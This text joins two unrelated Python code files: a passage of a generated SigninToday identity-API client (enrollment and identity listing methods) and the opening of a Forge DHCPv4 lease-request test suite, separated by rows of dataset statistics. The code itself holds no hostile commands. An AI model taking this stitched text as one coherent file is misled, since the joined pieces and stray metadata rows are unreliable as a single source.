all_params = ['organization_id', 'where_provider', 'where_user', 'where_first_name', 'where_last_name', 'where_registered_by', 'where_fiscal_code', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_enrollment_requests" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_enrollment_requests`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_enrollment_requests`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_enrollment_requests`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
if 'where_provider' in local_var_params:
query_params.append(('where_provider', local_var_params['where_provider'])) # noqa: E501
if 'where_user' in local_var_params:
query_params.append(('where_user', local_var_params['where_user'])) # noqa: E501
if 'where_first_name' in local_var_params:
query_params.append(('where_first_name', local_var_params['where_first_name'])) # noqa: E501
if 'where_last_name' in local_var_params:
query_params.append(('where_last_name', local_var_params['where_last_name'])) # noqa: E501
if 'where_registered_by' in local_var_params:
query_params.append(('where_registered_by', local_var_params['where_registered_by'])) # noqa: E501
if 'where_fiscal_code' in local_var_params:
query_params.append(('where_fiscal_code', local_var_params['where_fiscal_code'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2005', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_identities(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the identities of an organization # noqa: E501
This API allows you to enumerate all the identities of an organization. It is possible to filter the data using the supported _django lookups_. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_identities(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param str where_provider: Returns the identities that have been issued by the specified provider
:param str where_user: Returns the identities of the specified user, searched by their id
:param str where_first_name: Returns the identities of the users that have the specified first name
:param str where_last_name: Returns the identities of the users that have the specified last name
:param str where_registered_by: Returns the identities registered by this user
:param str where_fiscal_code: Returns the identities that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_identities_with_http_info(organization_id, **kwargs) # noqa: E501
def list_identities_with_http_info(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the identities of an organization # noqa: E501
This API allows you to enumerate all the identities of an organization. It is possible to filter the data using the supported _django lookups_. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_identities_with_http_info(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param str where_provider: Returns the identities that have been issued by the specified provider
:param str where_user: Returns the identities of the specified user, searched by their id
:param str where_first_name: Returns the identities of the users that have the specified first name
:param str where_last_name: Returns the identities of the users that have the specified last name
:param str where_registered_by: Returns the identities registered by this user
:param str where_fiscal_code: Returns the identities that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'where_provider', 'where_user', 'where_first_name', 'where_last_name', 'where_registered_by', 'where_fiscal_code', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_identities`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_identities`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_identities`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
if 'where_provider' in local_var_params:
query_params.append(('where_provider', local_var_params['where_provider'])) # noqa: E501
if 'where_user' in local_var_params:
query_params.append(('where_user', local_var_params['where_user'])) # noqa: E501
if 'where_first_name' in local_var_params:
query_params.append(('where_first_name', local_var_params['where_first_name'])) # noqa: E501
if 'where_last_name' in local_var_params:
query_params.append(('where_last_name', local_var_params['where_last_name'])) # noqa: E501
if 'where_registered_by' in local_var_params:
query_params.append(('where_registered_by', local_var_params['where_registered_by'])) # noqa: E501
if 'where_fiscal_code' in local_var_params:
query_params.append(('where_fiscal_code', local_var_params['where_fiscal_code'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_user_enrollments(self, organization_id, user_id, **kwargs): # noqa: E501
"""List the enrollments of an user # noqa: E501
This API allows to list all the enrollments of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_enrollments(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2005
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_user_enrollments_with_http_info(organization_id, user_id, **kwargs) # noqa: E501
def list_user_enrollments_with_http_info(self, organization_id, user_id, **kwargs): # noqa: E501
"""List the enrollments of an user # noqa: E501
This API allows to list all the enrollments of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_enrollments_with_http_info(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data only, without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2005, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_enrollments" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_user_enrollments`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `list_user_enrollments`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_enrollments`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_enrollments`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/identity-requests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2005', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
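# --- Editor's usage sketch (illustrative only). It assumes the enclosing class is
# instantiated as `api`, as the docstring examples above already do; the 'acme'
# organization slug is a placeholder.
# >>> # synchronous call: first page, at most 100 enrollments (count must be 1..100)
# >>> enrollments = api.list_user_enrollments('acme', user_id, page=1, count=100)
# >>> # asynchronous call: a thread-like object is returned; .get() blocks for the result
# >>> thread = api.list_user_enrollments('acme', user_id, async_req=True)
# >>> enrollments = thread.get()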
def list_user_identities(self, organization_id, user_id, **kwargs): # noqa: E501
"""Enumerate the identities of an user # noqa: E501
This API allows to enumerate all the identities of an user, which are located in its wallet. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_identities(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_user_identities_with_http_info(organization_id, user_id, **kwargs) # noqa: E501
def list_user_identities_with_http_info(self, organization_id, user_id, **kwargs): # noqa: E501
"""Enumerate the identities of an user # noqa: E501
This API allows to enumerate all the identities of an user, which are located in its wallet. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_user_identities_with_http_info(organization_id, user_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param Id user_id: The **user-id** is the uuid code that identifies a user of an organization. It is used as a path parameter to restrict the requested operation to the scope of that user (required)
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: return the response data only, without the
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'user_id', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_user_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_user_identities`") # noqa: E501
# verify the required parameter 'user_id' is set
if ('user_id' not in local_var_params or
local_var_params['user_id'] is None):
raise ApiValueError("Missing the required parameter `user_id` when calling `list_user_identities`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_identities`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_user_identities`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['user-id'] = local_var_params['user_id'] # noqa: E501
query_params = []
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/users/{user-id}/wallet', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
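# --- Editor's usage sketch (illustrative only). The *_with_http_info variant
# returns a (data, status_code, headers) tuple, and passing _preload_content=False
# yields the raw urllib3.HTTPResponse instead, as documented above; `api` and the
# 'acme' slug are placeholders.
# >>> data, status, headers = api.list_user_identities_with_http_info('acme', user_id)
# >>> raw = api.list_user_identities('acme', user_id, _preload_content=False)
# >>> body = raw.data  # undecoded response body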
def request_enrollment(self, organization_id, identity_request, **kwargs): # noqa: E501
"""Submit an enrollment request # noqa: E501
This API allows submitting an enrollment request. The user referenced by the request will be created if it does not exist already. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_enrollment(organization_id, identity_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param IdentityRequest identity_request: The enrollment request to submit (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2011
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.request_enrollment_with_http_info(organization_id, identity_request, **kwargs) # noqa: E501
def request_enrollment_with_http_info(self, organization_id, identity_request, **kwargs): # noqa: E501
"""Submit an enrollment request # noqa: E501
This API allows submitting an enrollment request. The user referenced by the request will be created if it does not exist already. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.request_enrollment_with_http_info(organization_id, identity_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also known as the **slug**, and it is used as a path parameter to restrict the requested functionality to the specified organization (required)
:param IdentityRequest identity_request: The enrollment request to submit (required)
:param _return_http_data_only: return the response data only, without the
status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2011, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method request_enrollment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `request_enrollment`") # noqa: E501
# verify the required parameter 'identity_request' is set
if ('identity_request' not in local_var_params or
local_var_params['identity_request'] is None):
raise ApiValueError("Missing the required parameter `identity_request` when calling `request_enrollment`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'identity_request' in local_var_params:
body_params = local_var_params['identity_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/enroll', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2011', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
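# --- Editor's usage sketch (illustrative only). It assumes an IdentityRequest
# model is available from the same generated package; its fields are not shown in
# this file and are therefore assumptions, as are `api` and the 'acme' slug.
# >>> body = IdentityRequest()            # populate the enrollment payload here
# >>> created = api.request_enrollment('acme', body)
# >>> # the user referenced by the request is created if it does not exist yet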
| 63.199518
| 9,710
| 0.681243
| 11,433
| 104,848
| 6.023441
| 0.025977
| 0.033689
| 0.053669
| 0.018587
| 0.845061
| 0.84178
| 0.83799
| 0.835521
| 0.831862
| 0.825705
| 0
| 0.024944
| 0.254769
| 104,848
| 1,658
| 9,711
| 63.237636
| 0.856417
| 0.55034
| 0
| 0.808094
| 0
| 0.010444
| 0.247761
| 0.051883
| 0
| 1
| 0
| 0
| 0
| 1
| 0.035248
| false
| 0
| 0.006527
| 0
| 0.077024
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9967102c9cf3b62a9bbb862fa8f93e3f99d4c08b
| 14,985
|
py
|
Python
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv4/process/test_v4_request_part1.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""DHCPv4 address request process"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg
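# Descriptive note (added for readability): the numeric DHCP options requested and
# checked throughout these tests are option 1 (Subnet Mask), option 54 (DHCP Server
# Identifier) and option 61 (Client Identifier); 'yiaddr' is the "your IP address"
# field of the server's reply.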
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_chaddr(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_chaddr_multiple_pools(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.new_pool('192.168.50.2-192.168.50.2', 0)
srv_control.new_pool('192.168.50.3-192.168.50.3', 0)
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:01')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:01')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:02')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.2')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:02')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.2')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.2')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:03')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_include_option(1)
srv_msg.response_check_content('yiaddr', '192.168.50.3')
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:03')
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.3')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.3')
srv_msg.response_check_include_option(1)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.check_leases(srv_msg.get_all_leases(), backend=backend)
@pytest.mark.v4
@pytest.mark.request
def test_v4_request_selecting_success_chaddr_empty_pool():
misc.test_setup()
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'OFFER')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
misc.test_procedure()
srv_msg.client_copy_option('server_id')
srv_msg.client_does_include_with_value('requested_addr', '192.168.50.1')
srv_msg.client_requests_option(1)
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ACK')
srv_msg.response_check_content('yiaddr', '192.168.50.1')
srv_msg.response_check_include_option(1)
srv_msg.response_check_include_option(54)
srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
misc.test_procedure()
srv_msg.client_requests_option(1)
srv_msg.client_sets_value('Client', 'chaddr', 'ff:01:02:03:ff:04')
srv_msg.client_send_msg('DISCOVER')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
@pytest.mark.v4
@pytest.mark.request
@pytest.mark.parametrize("backend", ['memfile', 'mysql', 'postgresql'])
def test_v4_request_selecting_success_client_id(backend):
misc.test_setup()
srv_control.define_temporary_lease_db_backend(backend)
srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
